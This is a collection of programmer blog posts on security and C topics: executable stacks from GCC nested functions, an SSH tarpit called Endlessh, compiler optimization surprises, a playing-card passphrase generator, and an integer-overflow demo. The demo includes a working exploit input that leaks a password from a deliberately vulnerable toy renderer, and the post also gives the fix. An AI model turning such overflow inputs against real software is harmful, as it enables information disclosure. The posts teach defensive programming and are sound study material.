Articles tagged netsec at null program

Infectious Executable Stacks

2019-11-15T03:29:37Z

This article was discussed on Hacker News.

In software development there are many concepts that at first glance seem useful and sound, but, after considering the consequences of their implementation and use, are actually horrifying. Examples include thread cancellation, variable length arrays, and memory aliasing. GCC’s closure extension to C is another, and this little feature compromises the entire GNU toolchain.

GNU C nested functions

GCC has its own dialect of C called GNU C. One feature unique to GNU C is nested functions, which allow C programs to define functions inside other functions:

void intsort1(int *base, size_t nmemb)
{
    int cmp(const void *a, const void *b)
    {
        return *(int *)a - *(int *)b;
    }
    qsort(base, nmemb, sizeof(*base), cmp);
}

The nested function above is straightforward and harmless. It’s nothing groundbreaking, and it is trivial for the compiler to implement. The cmp function is really just a static function whose scope is limited to the containing function, no different than a local static variable.

With one slight variation the nested function turns into a closure. This is where things get interesting:

void intsort2(int *base, size_t nmemb, _Bool invert)
{
    int cmp(const void *a, const void *b)
    {
        int r = *(int *)a - *(int *)b;
        return invert ? -r : r;
    }
    qsort(base, nmemb, sizeof(*base), cmp);
}

The invert variable from the outer scope is accessed from the inner scope. This has clean, proper closure semantics and works correctly just as you’d expect. It fits quite well with traditional C semantics. The closure itself is re-entrant and thread-safe. It’s automatically (read: stack) allocated, and so it’s automatically freed when the function returns, including when the stack is unwound via longjmp(). It’s a natural progression to support closures like this via nested functions. The eventual caller, qsort, doesn’t even know it’s calling a closure!

While this seems so useful and easy, its implementation has serious consequences that, in general, outweigh its benefits. In fact, in order to make this work, the whole GNU toolchain has been specially rigged!

How does it work? The function pointer, cmp, passed to qsort must somehow be associated with its lexical environment, specifically the invert variable. A static address won’t do. When I implemented closures as a toy library, I talked about the function address for each closure instance somehow needing to be unique.

GCC accomplishes this by constructing a trampoline on the stack. That trampoline has access to the local variables stored adjacent to it, also on the stack. GCC also generates a normal cmp function, like the simple nested function before, that accepts invert as an additional argument. The trampoline calls this function, passing the local variable as this additional argument.

Trampoline illustration

To illustrate this, I’ve manually implemented intsort2() below for x86-64 (System V ABI) without using GCC’s nested function extension:

int cmp(const void *a, const void *b, _Bool invert)
{
    int r = *(int *)a - *(int *)b;
    return invert ? -r : r;
}

void intsort3(int *base, size_t nmemb, _Bool invert)
{
    unsigned long fp = (unsigned long)cmp;
    volatile unsigned char buf[] = {
        // mov  edx, invert
        0xba, invert, 0x00, 0x00, 0x00,
        // mov  rax, cmp
        0x48, 0xb8, fp >>  0, fp >>  8, fp >> 16, fp >> 24,
                    fp >> 32, fp >> 40, fp >> 48, fp >> 56,
        // jmp  rax
        0xff, 0xe0
    };
    int (*trampoline)(const void *, const void *) = (void *)buf;
    qsort(base, nmemb, sizeof(*base), trampoline);
}

Here’s a complete example you can try yourself on nearly any x86-64 unix-like system: trampoline.c. It even works with Clang. The two notable systems where stack trampolines won’t work are OpenBSD and WSL.

(Note: The volatile is necessary because C compilers rightfully do not see the contents of buf as being consumed. Execution of the contents isn’t considered.)

In case you hadn’t already caught it, there’s a catch. The linker needs to link a binary that asks the loader for an executable stack (-z execstack):

$ cc -std=c99 -Os -Wl,-z,execstack trampoline.c

That’s because buf contains x86 code implementing the trampoline:

mov  edx, invert    ; assign third argument
mov  rax, cmp       ; store cmp address in RAX register
jmp  rax            ; jump to cmp

(Note: The absolute jump through a 64-bit register is necessary because the trampoline on the stack and the jump target will be very far apart. Further, these days the program will likely be compiled as a Position Independent Executable (PIE), so cmp might itself have an high address rather than load into the lowest 32 bits of the address space.)

However, executable stacks were phased out ~15 years ago because it makes buffer overflows so much more dangerous! Attackers can inject and execute whatever code they like, typically shellcode. That’s why we need this unusual linker option.

You can see that the stack will be executable using our old friend, readelf:

$ readelf -l a.out
...
  GNU_STACK  0x00000000 0x00000000 0x00000000
             0x00000000 0x00000000 RWE   0x10
...

Note the “RWE” at the bottom right, meaning read-write-execute. This is a really bad sign in a real binary. Do any binaries installed on your system right now have an executable stack? I found one on mine. (Update: A major one was found in the comments by Walter Misar.)

When compiling the original version using a nested function there’s no need for that special linker option. That’s because GCC saw that it would need an executable stack and used this option automatically.

Or, more specifically, GCC stopped requesting a non-executable stack in the object file it produced. For the GNU Binutils linker, the default is an executable stack.

Fail open design

Since this is the default, the only way to get a non-executable stack is if every object file input to the linker explicitly declares that it does not need an executable stack. To request a non-executable stack, an object file must contain the (empty) section .note.GNU-stack. If even a single object file fails to do this, then the final program gets an executable stack.

Not only does one contaminated object file infect the binary, everything dynamically linked with it also gets an executable stack. Entire processes are infected! This occurs even via dlopen(), where the stack is dynamically made executable to accomodate the new shared object.

I’ve been bit myself. In Baking Data with Serialization I did it completely by accident, and I didn’t notice my mistake until three years later. The GNU linker outputs object files without the special note by default even though the object file only contains data.

$ echo hello world >hello.txt
$ ld -r -b binary -o hello.o hello.txt
$ readelf -S hello.o | grep GNU-stack
$

This is fixed with -z noexecstack:

$ ld -r -b binary -z noexecstack -o hello.o hello.txt
$ readelf -S hello.o | grep GNU-stack
  [ 2] .note.GNU-stack  PROGBITS  00000000  0000004c
$

This may happen any time you link object files not produced by GCC, such as output from the NASM assembler or hand-crafted object files.

Nested C closures are super slick, but they’re just not worth the risk of an executable stack, and they’re certainly not worth an entire toolchain being fail open about it.

Update: A rebuttal. My short response is that the issue discussed in my article isn’t really about C the language but rather about an egregious issue with one particular toolchain. The problem doesn’t even arise if you use only C, but instead when linking in object files specifically not derived from C code.

Endlessh: an SSH Tarpit

2019-03-22T17:26:45Z

This article was discussed on Hacker News (later), on reddit (also), featured in BSD Now 294. Also check out this Endlessh analysis.

I’m a big fan of tarpits: a network service that intentionally inserts delays in its protocol, slowing down clients by forcing them to wait. This arrests the speed at which a bad actor can attack or probe the host system, and it ties up some of the attacker’s resources that might otherwise be spent attacking another host. When done well, a tarpit imposes more cost on the attacker than the defender.

The Internet is a very hostile place, and anyone who’s ever stood up an Internet-facing IPv4 host has witnessed the immediate and continuous attacks against their server. I’ve maintained such a server for nearly six years now, and more than 99% of my incoming traffic has ill intent. One part of my defenses has been tarpits in various forms. The latest addition is an SSH tarpit I wrote a couple of months ago:

Endlessh: an SSH tarpit

This program opens a socket and pretends to be an SSH server. However, it actually just ties up SSH clients with false promises indefinitely — or at least until the client eventually gives up. After cloning the repository, here’s how you can try it out for yourself (default port 2222):

$ make
$ ./endlessh &
$ ssh -p2222 localhost

Your SSH client will hang there and wait for at least several days before finally giving up. Like a mammoth in the La Brea Tar Pits, it got itself stuck and can’t get itself out. As I write, my Internet-facing SSH tarpit currently has 27 clients trapped in it. A few of these have been connected for weeks. In one particular spike it had 1,378 clients trapped at once, lasting about 20 hours.

My Internet-facing Endlessh server listens on port 22, which is the standard SSH port. I long ago moved my real SSH server off to another port where it sees a whole lot less SSH traffic — essentially none. This makes the logs a whole lot more manageable. And (hopefully) Endlessh convinces attackers not to look around for an SSH server on another port.

How does it work? Endlessh exploits a little paragraph in RFC 4253, the SSH protocol specification. Immediately after the TCP connection is established, and before negotiating the cryptography, both ends send an identification string:

SSH-protoversion-softwareversion SP comments CR LF

The RFC also notes:

The server MAY send other lines of data before sending the version string.

There is no limit on the number of lines, just that these lines must not begin with “SSH-“ since that would be ambiguous with the identification string, and lines must not be longer than 255 characters including CRLF. So Endlessh sends and endless stream of randomly-generated “other lines of data” without ever intending to send a version string. By default it waits 10 seconds between each line. This slows down the protocol, but prevents it from actually timing out.

This means Endlessh need not know anything about cryptography or the vast majority of the SSH protocol. It’s dead simple.

Implementation strategies

Ideally the tarpit’s resource footprint should be as small as possible. It’s just a security tool, and the server does have an actual purpose that doesn’t include being a tarpit. It should tie up the attacker’s resources, not the server’s, and should generally be unnoticeable. (Take note all those who write the awful “security” products I have to tolerate at my day job.)

Even when many clients have been trapped, Endlessh spends more than 99.999% of its time waiting around, doing nothing. It wouldn’t even be accurate to call it I/O-bound. If anything, it’s timer-bound, waiting around before sending off the next line of data. The most precious resource to conserve is memory.

Processes

The most straightforward way to implement something like Endlessh is a fork server: accept a connection, fork, and the child simply alternates between sleep(3) and write(2):

for (;;) {
    ssize_t r;
    char line[256];

    sleep(DELAY);
    generate_line(line);
    r = write(fd, line, strlen(line));
    if (r == -1 && errno != EINTR) {
        exit(0);
    }
}

A process per connection is a lot of overhead when connections are expected to be up hours or even weeks at a time. An attacker who knows about this could exhaust the server’s resources with little effort by opening up lots of connections.

Threads

A better option is, instead of processes, to create a thread per connection. On Linux this is practically the same thing, but it’s still better. However, you still have to allocate a stack for the thread and the kernel will have to spend some resources managing the thread.

Poll

For Endlessh I went for an even more lightweight version: a single-threaded poll(2) server, analogous to stackless green threads. The overhead per connection is about as low as it gets.

Clients that are being delayed are not registered in poll(2). Their only overhead is the socket object in the kernel, and another 78 bytes to track them in Endlessh. Most of those bytes are used only for accurate logging. Only those clients that are overdue for a new line are registered for poll(2).

When clients are waiting, but no clients are overdue, poll(2) is essentially used in place of sleep(3). Though since it still needs to manage the accept server socket, it (almost) never actually waits on nothing.

There’s an option to limit the total number of client connections so that it doesn’t get out of hand. In this case it will stop polling the accept socket until a client disconnects. I probably shouldn’t have bothered with this option and instead relied on ulimit, a feature already provided by the operating system.

I could have used epoll (Linux) or kqueue (BSD), which would be much more efficient than poll(2). The problem with poll(2) is that it’s constantly registering and unregistering Endlessh on each of the overdue sockets each time around the main loop. This is by far the most CPU-intensive part of Endlessh, and it’s all inflicted on the kernel. Most of the time, even with thousands of clients trapped in the tarpit, only a small number of them at polled at once, so I opted for better portability instead.

One consequence of not polling connections that are waiting is that disconnections aren’t noticed in a timely fashion. This makes the logs less accurate than I like, but otherwise it’s pretty harmless. Unforunately even if I wanted to fix this, the poll(2) interface isn’t quite equipped for it anyway.

Raw sockets

With a poll(2) server, the biggest overhead remaining is in the kernel, where it allocates send and receive buffers for each client and manages the proper TCP state. The next step to reducing this overhead is Endlessh opening a raw socket and speaking TCP itself, bypassing most of the operating system’s TCP/IP stack.

Much of the TCP connection state doesn’t matter to Endlessh and doesn’t need to be tracked. For example, it doesn’t care about any data sent by the client, so no receive buffer is needed, and any data that arrives could be dropped on the floor.

Even more, raw sockets would allow for some even nastier tarpit tricks. Despite the long delays between data lines, the kernel itself responds very quickly on the TCP layer and below. ACKs are sent back quickly and so on. An astute attacker could detect that the delay is artificial, imposed above the TCP layer by an application.

If Endlessh worked at the TCP layer, it could tarpit the TCP protocol itself. It could introduce artificial “noise” to the connection that requires packet retransmissions, delay ACKs, etc. It would look a lot more like network problems than a tarpit.

I haven’t taken Endlessh this far, nor do I plan to do so. At the moment attackers either have a hard timeout, so this wouldn’t matter, or they’re pretty dumb and Endlessh already works well enough.

asyncio and other tarpits

Since writing Endless I’ve learned about Python’s asyncio, and it’s actually a near perfect fit for this problem. I should have just used it in the first place. The hard part is already implemented within asyncio, and the problem isn’t CPU-bound, so being written in Python doesn’t matter.

Here’s a simplified (no logging, no configuration, etc.) version of Endlessh implemented in about 20 lines of Python 3.7:

import asyncio
import random

async def handler(_reader, writer):
    try:
        while True:
            await asyncio.sleep(10)
            writer.write(b'%x\r\n' % random.randint(0, 2**32))
            await writer.drain()
    except ConnectionResetError:
        pass

async def main():
    server = await asyncio.start_server(handler, '0.0.0.0', 2222)
    async with server:
        await server.serve_forever()

asyncio.run(main())

Since Python coroutines are stackless, the per-connection memory overhead is comparable to the C version. So it seems asyncio is perfectly suited for writing tarpits! Here’s an HTTP tarpit to trip up attackers trying to exploit HTTP servers. It slowly sends a random, endless HTTP header:

import asyncio
import random

async def handler(_reader, writer):
    writer.write(b'HTTP/1.1 200 OK\r\n')
    try:
        while True:
            await asyncio.sleep(5)
            header = random.randint(0, 2**32)
            value = random.randint(0, 2**32)
            writer.write(b'X-%x: %x\r\n' % (header, value))
            await writer.drain()
    except ConnectionResetError:
        pass

async def main():
    server = await asyncio.start_server(handler, '0.0.0.0', 8080)
    async with server:
        await server.serve_forever()

asyncio.run(main())

Try it out for yourself. Firefox and Chrome will spin on that server for hours before giving up. I have yet to see curl actually timeout on its own in the default settings (--max-time/-m does work correctly, though).

Parting exercise for the reader: Using the examples above as a starting point, implement an SMTP tarpit using asyncio. Bonus points for using TLS connections and testing it against real spammers.

When the Compiler Bites

2018-05-01T23:28:06Z

Update: There are discussions on Reddit and on Hacker News.

So far this year I’ve been bitten three times by compiler edge cases in GCC and Clang, each time catching me totally by surprise. Two were caused by historical artifacts, where an ambiguous specification lead to diverging implementations. The third was a compiler optimization being far more clever than I expected, behaving almost like an artificial intelligence.

In all examples I’ll be using GCC 7.3.0 and Clang 6.0.0 on Linux.

x86-64 ABI ambiguity

The first time I was bit — or, well, narrowly avoided being bit — was when I examined a missed floating point optimization in both Clang and GCC. Consider this function:

double
zero_multiply(double x)
{
    return x * 0.0;
}

The function multiplies its argument by zero and returns the result. Any number multiplied by zero is zero, so this should always return zero, right? Unfortunately, no. IEEE 754 floating point arithmetic supports NaN, infinities, and signed zeros. This function can return NaN, positive zero, or negative zero. (In some cases, the operation could also potentially produce a hardware exception.)

As a result, both GCC and Clang perform the multiply:

zero_multiply:
    xorpd  xmm1, xmm1
    mulsd  xmm0, xmm1
    ret

The -ffast-math option relaxes the C standard floating point rules, permitting an optimization at the cost of conformance and consistency:

zero_multiply:
    xorps  xmm0, xmm0
    ret

Side note: -ffast-math doesn’t necessarily mean “less precise.” Sometimes it will actually improve precision.

Here’s a modified version of the function that’s a little more interesting. I’ve changed the argument to a short:

double
zero_multiply_short(short x)
{
    return x * 0.0;
}

It’s no longer possible for the argument to be one of those special values. The short will be promoted to one of 65,535 possible double values, each of which results in 0.0 when multiplied by 0.0. GCC misses this optimization (-Os):

zero_multiply_short:
    movsx     edi, di       ; sign-extend 16-bit argument
    xorps     xmm1, xmm1    ; xmm1 = 0.0
    cvtsi2sd  xmm0, edi     ; convert int to double
    mulsd     xmm0, xmm1
    ret

Clang also misses this optimization:

zero_multiply_short:
    cvtsi2sd xmm1, edi
    xorpd    xmm0, xmm0
    mulsd    xmm0, xmm1
    ret

But hang on a minute. This is shorter by one instruction. What happened to the sign-extension (movsx)? Clang is treating that short argument as if it were a 32-bit value. Why do GCC and Clang differ? Is GCC doing something unnecessary?

It turns out that the x86-64 ABI didn’t specify what happens with the upper bits in argument registers. Are they garbage? Are they zeroed? GCC takes the conservative position of assuming the upper bits are arbitrary garbage. Clang takes the boldest position of assuming arguments smaller than 32 bits have been promoted to 32 bits by the caller. This is what the ABI specification should have said, but currently it does not.

Fortunately GCC also conservative when passing arguments. It promotes arguments to 32 bits as necessary, so there are no conflicts when linking against Clang-compiled code. However, this is not true for Intel’s ICC compiler: Clang and ICC are not ABI-compatible on x86-64.

I don’t use ICC, so that particular issue wouldn’t bite me, but if I was ever writing assembly routines that called Clang-compiled code, I’d eventually get bit by this.

Floating point precision

Without looking it up or trying it, what does this function return? Think carefully.

int
float_compare(void)
{
    float x = 1.3f;
    return x == 1.3f;
}

Confident in your answer? This is a trick question, because it can return either 0 or 1 depending on the compiler. Boy was I confused when this comparison returned 0 in my real world code.

$ gcc   -std=c99 -m32 cmp.c  # float_compare() == 0
$ clang -std=c99 -m32 cmp.c  # float_compare() == 1

So what’s going on here? The original ANSI C specification wasn’t clear about how intermediate floating point values get rounded, and implementations all did it differently. The C99 specification cleaned this all up and introduced FLT_EVAL_METHOD. Implementations can still differ, but at least you can now determine at compile-time what the compiler would do by inspecting that macro.

Back in the late 1980’s or early 1990’s when the GCC developers were deciding how GCC should implement floating point arithmetic, the trend at the time was to use as much precision as possible. On the x86 this meant using its support for 80-bit extended precision floating point arithmetic. Floating point operations are performed in long double precision and truncated afterward (FLT_EVAL_METHOD == 2).

In float_compare() the left-hand side is truncated to a float by the assignment, but the right-hand side, despite being a float literal, is actually “1.3” at 80 bits of precision as far as GCC is concerned. That’s pretty unintuitive!

The remnants of this high precision trend are still in JavaScript, where all arithmetic is double precision (even if simulated using integers), and great pains have been made to work around the performance consequences of this. Until recently, Mono had similar issues.

The trend reversed once SIMD hardware became widely available and there were huge performance gains to be had. Multiple values could be computed at once, side by side, at lower precision. So on x86-64, this became the default (FLT_EVAL_METHOD == 0). The young Clang compiler wasn’t around until well after this trend reversed, so it behaves differently than the backwards compatible GCC on the old x86.

I’m a little ashamed that I’m only finding out about this now. However, by the time I was competent enough to notice and understand this issue, I was already doing nearly all my programming on the x86-64.

Built-in Function Elimination

I’ve saved this one for last since it’s my favorite. Suppose we have this little function, new_image(), that allocates a greyscale image for, say, some multimedia library.

static unsigned char *
new_image(size_t w, size_t h, int shade)
{
    unsigned char *p = 0;
    if (w == 0 || h <= SIZE_MAX / w) { // overflow?
        p = malloc(w * h);
        if (p) {
            memset(p, shade, w * h);
        }
    }
    return p;
}

It’s a static function because this would be part of some slick header library (and, secretly, because it’s necessary for illustrating the issue). Being a responsible citizen, the function even checks for integer overflow before allocating anything.

I write a unit test to make sure it detects overflow. This function should return 0.

/* expected return == 0 */
int
test_new_image_overflow(void)
{
    void *p = new_image(2, SIZE_MAX, 0);
    return !!p;
}

So far my test passes. Good.

I’d also like to make sure it correctly returns NULL — or, more specifically, that it doesn’t crash — if the allocation fails. But how can I make malloc() fail? As a hack I can pass image dimensions that I know cannot ever practically be allocated. Essentially I want to force a malloc(SIZE_MAX), e.g. allocate every available byte in my virtual address space. For a conventional 64-bit machine, that’s 16 exibytes of memory, and it leaves space for nothing else, including the program itself.

/* expected return == 0 */
int
test_new_image_oom(void)
{
    void *p = new_image(1, SIZE_MAX, 0xff);
    return !!p;
}

I compile with GCC, test passes. I compile with Clang and the test fails. That is, the test somehow managed to allocate 16 exibytes of memory, and initialize it. Wat?

Disassembling the test reveals what’s going on:

test_new_image_overflow:
    xor  eax, eax
    ret

test_new_image_oom:
    mov  eax, 1
    ret

The first test is actually being evaluated at compile time by the compiler. The function being tested was inlined into the unit test itself. This permits the compiler to collapse the whole thing down to a single instruction. The path with malloc() became dead code and was trivially eliminated.

In the second test, Clang correctly determined that the image buffer is not actually being used, despite the memset(), so it eliminated the allocation altogether and then simulated a successful allocation despite it being absurdly large. Allocating memory is not an observable side effect as far as the language specification is concerned, so it’s allowed to do this. My thinking was wrong, and the compiler outsmarted me.

I soon realized I can take this further and trick Clang into performing an invalid optimization, revealing a bug. Consider this slightly-optimized version that uses calloc() when the shade is zero (black). The calloc() function does its own overflow check, so new_image() doesn’t need to do it.

static void *
new_image(size_t w, size_t h, int shade)
{
    unsigned char *p = 0;
    if (shade == 0) { // shortcut
        p = calloc(w, h);
    } else if (w == 0 || h <= SIZE_MAX / w) { // overflow?
        p = malloc(w * h);
        if (p) {
            memset(p, color, w * h);
        }
    }
    return p;
}

With this change, my overflow unit test is now also failing. The situation is even worse than before. The calloc() is being eliminated despite the overflow, and replaced with a simulated success. This time it’s actually a bug in Clang. While failing a unit test is mostly harmless, this could introduce a vulnerability in a real program. The OpenBSD folks are so worried about this sort of thing that they’ve disabled this optimization.

Here’s a slightly-contrived example of this. Imagine a program that maintains a table of unsigned integers, and we want to keep track of how many times the program has accessed each table entry. The “access counter” table is initialized to zero, but the table of values need not be initialized, since they’ll be written before first access (or something like that).

struct table {
    unsigned *counter;
    unsigned *values;
};

static int
table_init(struct table *t, size_t n)
{
    t->counter = calloc(n, sizeof(*t->counter));
    if (t->counter) {
        /* Overflow already tested above */
        t->values = malloc(n * sizeof(*t->values));
        if (!t->values) {
            free(t->counter);
            return 0; // fail
        }
        return 1; // success
    }
    return 0; // fail
}

This function relies on the overflow test in calloc() for the second malloc() allocation. However, this is a static function that’s likely to get inlined, as we saw before. If the program doesn’t actually make use of the counter table, and Clang is able to statically determine this fact, it may eliminate the calloc(). This would also eliminate the overflow test, introducing a vulnerability. If an attacker can control n, then they can overwrite arbitrary memory through that values pointer.

The takeaway

Besides this surprising little bug, the main lesson for me is that I should probably isolate unit tests from the code being tested. The easiest solution is to put them in separate translation units and don’t use link-time optimization (LTO). Allowing tested functions to be inlined into the unit tests is probably a bad idea.

The unit test issues in my real program, which was a bit more sophisticated than what was presented here, gave me artificial intelligence vibes. It’s that situation where a computer algorithm did something really clever and I felt it outsmarted me. It’s creepy to consider how far that can go. I’ve gotten that even from observing AI I’ve written myself, and I know for sure no human taught it some particularly clever trick.

My favorite AI story along these lines is about an AI that learned how to play games on the Nintendo Entertainment System. It didn’t understand the games it was playing. It’s optimization task was simply to choose controller inputs that maximized memory values, because that’s generally associated with doing well — higher scores, more progress, etc. The most unexpected part came when playing Tetris. Eventually the screen would fill up with blocks, and the AI would face the inevitable situation of losing the game, with all that memory being reinitialized to low values. So what did it do?

Just before the end it would pause the game and wait… forever.

Introducing the Pokerware Secure Passphrase Generator

2017-07-27T17:49:10Z

I recently developed Pokerware, an offline passphrase generator that operates in the same spirit as Diceware. The primary difference is that it uses a shuffled deck of playing cards as its entropy source rather than dice. Draw some cards and use them to select a uniformly random word from a list. Unless you’re some sort of tabletop gaming nerd, a deck of cards is more readily available than five 6-sided dice, which would typically need to be borrowed from the Monopoly board collecting dust on the shelf, then rolled two at a time.

There are various flavors of two different word lists here:

https://github.com/skeeto/pokerware/releases/tag/1.0

Hardware random number generators are difficult to verify and may not actually be as random as they promise, either intentionally or unintentionally. For the particularly paranoid, Diceware and Pokerware are an easily verifiable alternative for generating secure passphrases for cryptographic purposes. At any time, a deck of 52 playing cards is in one of 52! possible arrangements. That’s more than 225 bits of entropy. If you give your deck a thorough shuffle, it will be in an arrangement that has never been seen before and will never be seen again. Pokerware draws on some of these bits to generate passphrases.

The Pokerware list has 5,304 words (12.4 bits per word), compared to Diceware’s 7,776 words (12.9 bits per word). My goal was to invent a card-drawing scheme that would uniformly select from a list in the same sized ballpark as Diceware. Much smaller and you’d have to memorize more words for the same passphrase strength. Much larger and the words on the list would be more difficult to memorize, since the list would contain longer and less frequently used words. Diceware strikes a nice balance at five dice.

One important difference for me is that I like my Pokerware word lists a lot more than the two official Diceware lists. My lists only have simple, easy-to-remember words (for American English speakers, at least), without any numbers or other short non-words. Pokerware has two official lists, “formal” and “slang,” since my early testers couldn’t agree on which was better. Rather than make a difficult decision, I took the usual route of making no decision at all.

The “formal” list is derived in part from Google’s Ngram Viewer, with my own additional filters and tweaking. It’s called “formal” because the ngrams come from formal publications and represent more formal kinds of speech.

The “slang” list is derived from every reddit comment between December 2005 and May 2017, tamed by the same additional filters. I have this data on hand, so I may as well put it to use. I figured more casually-used words would be easier to remember. Due to my extra filtering, there’s actually a lot of overlap between these lists, so the differences aren’t too significant.

If you have your own word list, perhaps in a different language, you can use the Makefile in the repository to build your own Pokerware lookup table, both plain text and PDF. The PDF is generated using Groff macros.

Passphrase generation instructions

Thoroughly shuffle the deck.
Draw two cards. Sort them by value, then suit. Suits are in alphabetical order: Clubs, Diamonds, Hearts, Spades.
Draw additional cards until you get a card that doesn’t match the face value of either of your initial two cards. Observe its suit.
Using your two cards and observed suit, look up a word in the table.
Place all cards back in the deck, shuffle, and repeat from step 2 until you have the desired number of words. Each word is worth 12.4 bits of entropy.

A word of warning about step 4: If you use software to do the word list lookup, beware that it might save your search/command history — and therefore your passphrase — to a file. For example, the less pager will store search history in ~/.lesshst. It’s easy to prevent that one:

$ LESSHISTFILE=- less pokerware-slang.txt

Example word generation

Suppose in step 2 you draw King of Hearts (KH/K♥) and Queen of Clubs (QC/Q♣).

In step 3 you first draw King of Diamonds (KD/K♦), discarding it because it matches the face value of one of your cards from step 2.

Next you draw Four of Spades (4S/4♠), taking spades as your extra suit.

In order, this gives you Queen of Clubs, King of Hearts, and Spades: QCKHS or Q♣K♥♠. This corresponds to “wizard” in the formal word list and would be the first word in your passphrase.

A deck of cards as an office tool

I now have an excuse to keep a deck of cards out on my desk at work. I’ve been using Diceware — or something approximating it since I’m not so paranoid about hardware RNGs. From now I’ll deal new passwords from an in-reach deck of cards. Though typically I need to tweak the results to meet outdated character-composition requirements.

Integer Overflow into Information Disclosure

2017-07-19T01:57:36Z

Last week I was discussing CVE-2017-7529 with my intern. Specially crafted input to Nginx causes an integer overflow which has the potential to leak sensitive information. But how could an integer overflow be abused to trick a program into leaking information? To answer this question, I put together the simplest practical example I could imagine.

https://github.com/skeeto/integer-overflow-demo

This small C program converts a vector image from a custom format (described below) into a Netpbm image, a conveniently simple format. The program defensively and carefully parses its input, but still makes a subtle, fatal mistake. This mistake not only leads to sensitive information disclosure, but, with a more sophisticated attack, could be used to execute arbitrary code.

After getting the hang of the interface for the program, I encourage you to take some time to work out an exploit yourself. Regardless, I’ll reveal a functioning exploit and explain how it works.

A new vector format

The input format is line-oriented and very similar to Netpbm itself. The first line is the header, starting with the magic number V2 (ASCII) followed by the image dimensions. The target output format is Netpbm’s “P2” (text gray scale) format, so the “V2” parallels it. The file must end with a newline.

V2

What follows is drawing commands, one per line. For example, the s command sets the value of a particular pixel.

s   <00–ff>

Since it’s not important for the demonstration, this is the only command I implemented. It’s easy to imagine additional commands to draw lines, circles, Bezier curves, etc.

Here’s an example (example.txt) that draws a single white point in the middle of the image:

V2 256 256
s 127 127 ff

The rendering tool reads standard input to standard output:

$ render < example.txt > example.pgm

Here’s what it looks like rendered:

However, you will notice that when you run the rendering tool, it prompts you for username and password. This is silly, of course, but it’s an excuse to get “sensitive” information into memory. It will accept any username/password combination where the username and password don’t match each other. The key is this: It’s possible to craft a valid image that leaks the the entered password.

Tour of the implementation

Without spoiling anything yet, let’s look at how this program works. The first thing to notice is that I’m using a custom “obstack” allocator instead of malloc() and free(). Real-world allocators have some defenses against this particular vulnerability. Plus a specific exploit would have to target a specific libc. By using my own allocator, the exploit will mostly be portable, making for a better and easier demonstration.

The allocator interface should be pretty self-explanatory, except for two details. This is an obstack allocator, so freeing an object also frees every object allocated after it. Also, it doesn’t call malloc() in the background. At initialization you give it a buffer from which to allocate all memory.

struct mstack {
    char *top;
    char *max;
    char buf[];
};

struct mstack *mstack_init(void *, size_t);
void          *mstack_alloc(struct mstack *, size_t);
void           mstack_free(struct mstack *, void *);

There are no vulnerabilities in these functions (I hope!). It’s just here for predictability.

Next here’s the “authentication” function. It reads a username and password combination from /dev/tty. It’s only an excuse to get a flag in memory for this capture-the-flag game. The username and password must be less than 32 characters each.

int
authenticate(struct mstack *m)
{
    FILE *tty = fopen("/dev/tty", "r+");
    if (!tty) {
        perror("/dev/tty");
        return 0;
    }

    char *user = mstack_alloc(m, 32);
    if (!user) {
        fclose(tty);
        return 0;
    }
    fputs("User: ", tty);
    fflush(tty);
    if (!fgets(user, 32, tty))
        user[0] = 0;

    char *pass = mstack_alloc(m, 32);
    int result = 0;
    if (pass) {
        fputs("Password: ", tty);
        fflush(tty);
        if (fgets(pass, 32, tty))
            result = strcmp(user, pass) != 0;
    }

    fclose(tty);
    mstack_free(m, user);
    return result;
}

Next here’s a little version of calloc() for the custom allocator. Hmm, I wonder why this is called “naive”…

void *
naive_calloc(struct mstack *m, unsigned long nmemb, unsigned long size)
{
    void *p = mstack_alloc(m, nmemb * size);
    if (p)
        memset(p, 0, nmemb * size);
    return p;
}

Next up is a paranoid wrapper for strtoul() that defensively checks its inputs. If it’s out of range of an unsigned long, it bails out. If there’s trailing garbage, it bails out. If there’s no number at all, it bails out. If you make prolonged eye contact, it bails out.

unsigned long
safe_strtoul(char *nptr, char **endptr, int base)
{
    errno = 0;
    unsigned long n = strtoul(nptr, endptr, base);
    if (errno) {
        perror(nptr);
        exit(EXIT_FAILURE);
    } else if (nptr == *endptr) {
        fprintf(stderr, "Expected an integer\n");
        exit(EXIT_FAILURE);
    } else if (!isspace(**endptr)) {
        fprintf(stderr, "Invalid character '%c'\n", **endptr);
        exit(EXIT_FAILURE);
    }
    return n;
}

The main() function parses the header using this wrapper and allocates some zeroed memory:

    unsigned long width = safe_strtoul(p, &p, 10);
    unsigned long height = safe_strtoul(p, &p, 10);
    unsigned char *pixels = naive_calloc(m, width, height);
    if (!pixels) {
        fputs("Not enough memory\n", stderr);
        exit(EXIT_FAILURE);
    }

Then there’s a command processing loop, also using safe_strtoul(). It carefully checks bounds against width and height. Finally it writes out a Netpbm, P2 (.pgm) format.

    printf("P2\n%ld %ld 255\n", width, height);
    for (unsigned long y = 0; y < height; y++) {
        for (unsigned long x = 0; x < width; x++)
            printf("%d ", pixels[y * width + x]);
        putchar('\n');
    }

The vulnerability is in something I’ve shown above. Can you find it?

Exploiting the renderer

Did you find it? If you’re on a platform with 64-bit long, here’s your exploit:

V2 16 1152921504606846977

And here’s an exploit for 32-bit long:

V2 16 268435457

Here’s how it looks in action. The most obvious result is that the program crashes:

$ echo V2 16 1152921504606846977 | ./mstack > capture.txt
User: coolguy
Password: mysecret
Segmentation fault

Here are the initial contents of capture.txt:

P2
1152921504606846977 255
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
121 115 101 99 114 101 116 10 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

Where did those junk numbers come from in the image data? Plug them into an ASCII table and you’ll get “mysecret”. Despite allocating the image with naive_calloc(), the password has found its way into the image! How could this be?

What happened is that width * height overflows an unsigned long. (Well, technically speaking, unsigned integers are defined not to overflow in C, wrapping around instead, but it’s really the same thing.) In naive_calloc(), the overflow results in a value of 16, so it only allocates and clears 16 bytes. The requested allocation “succeeds” despite far exceeding the available memory. The caller has been given a lot less memory than expected, and the memory believed to have been allocated contains a password.

The final part that writes the output doesn’t multiply the integers and doesn’t need to test for overflow. It uses a nested loop instead, continuing along with the original, impossible image size.

How do we fix this? Add an overflow check at the beginning of the naive_calloc() function (making it no longer naive). This is what the real calloc() does.

    if (nmemb && size > -1UL / nmemb)
        return 0;

The frightening takeaway is that this check is very easy to forget. It’s a subtle bug with potentially disastrous consequences.

